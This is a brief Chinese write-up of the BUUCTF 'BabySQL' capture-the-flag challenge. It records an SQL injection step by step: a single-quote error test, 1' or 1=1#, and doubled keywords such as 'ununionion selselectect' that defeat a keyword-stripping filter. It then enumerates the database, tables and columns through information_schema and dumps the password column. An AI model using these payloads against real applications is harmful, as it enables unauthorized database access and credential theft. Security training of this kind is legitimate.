buuctf [极客大挑战 2019]BabySQL
单引号测试报错
万能密码1’ or 1=1#
1’ or 1=1# 报错
想到可能是存在过滤,
双写or,使or过滤后重组为or
1’ oorr 1=1#
order by查字段
1’ oorrder bbyy 3# 页面正常

1’ oorrder bbyy 4# 报错
爆库名
1' ununionion selselectect 1,2,database()#
表
1' ununionion selselectect 1,2,group_concat(table_name) frfromom infofromrmation_schema.tables whwhereere table_schema=database()#
列
1' ununionion selselectect 1,2,group_concat(column_name) frfromom infofromrmation_schema.columns whwhereere table_name='b4bsql'#

爆password
1' ununionion selselectect 1,2,group_concat(passwoorrd) frfromom b4bsql#

注入时要求将过滤的字符全部双写
本文详细记录了一次SQL注入过程,从单引号测试到利用双写绕过过滤,再到数据库名、表名、列名的枚举,最终爆破密码。过程中展示了SQL注入的常见技巧和防御策略的规避方法。

5658

被折叠的 条评论
为什么被折叠?



